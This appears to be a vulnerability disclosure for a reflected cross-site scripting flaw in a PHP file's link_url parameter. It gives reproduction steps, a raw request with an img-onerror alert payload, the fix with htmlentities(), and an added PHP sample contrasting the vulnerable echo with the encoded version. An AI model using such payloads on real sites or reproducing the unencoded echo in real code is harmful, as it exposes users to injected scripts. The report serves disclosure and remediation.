Because the input data in $_REQUEST['link_url'] in the Ajax_url_encode.php file is not sanitized, an unauthenticated user can inject and execute JavaScript code through the link_url parameter.
Testing on local site:
Testing on demo site:
To Reproduce
XSS 1
Steps to reproduce the behavior:
Access the Ajax_url_encode.php file
Append ?link_url=[malicious script in here] to the Ajax_url_encode.php URL
The backend echoes the parameter back unencoded, so the malicious script executes in the browser
Request
GET /Ajax_url_encode.php?link_url=%3Cimg%20src=x%20onerror=alert(1);%3E HTTP/1.1
Host: 172.16.0.12:2222
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=mebdcag3g6jknfb8edrmee7ijp
Upgrade-Insecure-Requests: 1
Response
Solution:
Use the htmlentities() function when echoing the output.
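An added example (not the project's code) showing the reflected echo described in this report beside the fix the report proposes; the function names and the surrounding markup are assumptions, and the input is the report's own payload as PHP receives it after URL decoding:

```php
<?php
// Vulnerable form: the request value is reflected straight into the HTML body,
// so a value such as "<img src=x onerror=alert(1);>" becomes live markup.
// Note that $_REQUEST merges GET, POST and COOKIE data, so the source of the
// value is not even limited to the query string.
function render_vulnerable(string $link_url): string
{
    // Equivalent to: echo $_REQUEST['link_url'];
    return '<p>Link: ' . $link_url . '</p>';
}

// Hardened form: encode for the HTML context before echoing. ENT_QUOTES also
// encodes single quotes, so the value stays inert inside quoted attributes,
// and an explicit charset avoids encoder/decoder mismatches.
function render_fixed(string $link_url): string
{
    $safe = htmlentities($link_url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<p>Link: ' . $safe . '</p>';
}

// Constructed input: the payload from the report.
$input = '<img src=x onerror=alert(1);>';

echo "vulnerable: " . render_vulnerable($input) . PHP_EOL;
echo "fixed:      " . render_fixed($input) . PHP_EOL;

// Self-check: the hardened output must not contain a raw tag delimiter.
if (strpos(render_fixed($input), '<img') !== false) {
    fwrite(STDERR, "FAIL: tag survived encoding" . PHP_EOL);
    exit(1);
}
```

Run with `php example.php`; the encoded line shows the `<` and `>` of the payload as `&lt;` and `&gt;`, which the browser renders as text rather than parsing as an element.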